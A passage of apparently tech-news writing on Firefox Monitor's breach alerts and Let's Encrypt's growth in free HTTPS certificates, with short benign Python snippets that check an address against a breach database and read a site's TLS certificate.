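        headers={"hibp-api-key": api_key, "user-agent": "breach-check-example"},
        timeout=10,
    )
    if resp.status_code == 404:  # 404 means the address isn't in any known breach
        return []
    resp.raise_for_status()
    return [breach["Name"] for breach in resp.json()]
```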

When it first launched, Mozilla considered Firefox Monitor an experimental service. Now, it’s being launched as an official service.

If none of your accounts have been hacked yet, consider yourself lucky. That still makes you the perfect user for Firefox Monitor’s new alerting feature, though, because chances are your email address will show up in a future breach sooner or later. Indeed, when Mozilla first asked people which features they most wanted from a service like this, notifications about future breaches were very high on most people’s lists.

Mozilla notes that Firefox Monitor is just one of a number of new data and privacy features the organization has on its roadmap for the next few months. It’s clear that Mozilla is positioning itself as a neutral force and overall, that seems to be going quite well, especially given that Google’s Chrome browser is facing a bit of a backlash these days as users are increasingly concerned about their privacy and the vast trove of data Google collects.

Three years later, Let’s Encrypt has issued over 380 million HTTPS certificates

Bon anniversaire, Let’s Encrypt!

The free-to-use nonprofit was founded in 2014 in part by the Electronic Frontier Foundation and is backed by Akamai, Google, Facebook, Mozilla and more. Three years ago Friday, it issued its first certificate.

Since then, the numbers have exploded. To date, more than 380 million certificates have been issued on 129 million unique domains. That also makes it the largest certificate issuer in the world, by far.

Now, 75 percent of all Firefox traffic is HTTPS, according to public Firefox data — in part thanks to Let’s Encrypt. That’s a massive increase from when the organization was founded, when only 38 percent of website page loads were served over an HTTPS encrypted connection.

“Change at that speed and scale is incredible,” a spokesperson told TechCrunch. “Let’s Encrypt isn’t solely responsible for this change, but we certainly catalyzed it.”

HTTPS is what keeps the pipes of the web secure. Every time your browser lights up in green or flashes a padlock, it’s a TLS certificate encrypting the connection between your computer and the website, ensuring nobody can intercept and steal your data or modify the website.
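
You can inspect that certificate yourself. The short Python sketch below opens a TLS connection and reports who issued the site’s certificate and when it expires; for a site using Let’s Encrypt, the issuer organization reads Let’s Encrypt.

```python
# Sketch: open a TLS connection and summarize the certificate behind the padlock.
import socket
import ssl


def describe_certificate(hostname, port=443):
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()  # parsed certificate for the validated connection
    issuer = dict(item for rdn in cert["issuer"] for item in rdn)
    subject = dict(item for rdn in cert["subject"] for item in rdn)
    return {
        "subject": subject.get("commonName"),
        "issuer": issuer.get("organizationName"),
        "expires": cert.get("notAfter"),
    }


print(describe_certificate("letsencrypt.org"))
```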

But for years, the certificate market was broken, expensive and difficult to navigate. In an effort to “encrypt the web,” the EFF and others banded together to bring free TLS certificates to the masses.

That means bloggers, single-page websites and startups alike can get an easy-to-install certificate for free — even news sites like TechCrunch rely on Let’s Encrypt for a secure connection. Security experts and encryption advocates Scott Helme and Troy Hunt last month found that more than half of the top million websites by traffic are on HTTPS.

And as it’s grown, the certificate issuer has become trusted by the major players — including Apple, Google, Microsoft, Oracle and more.

A fully encrypted web is still a ways off. But with close to a million Let’s Encrypt certificates issued each day, it looks more within reach than ever.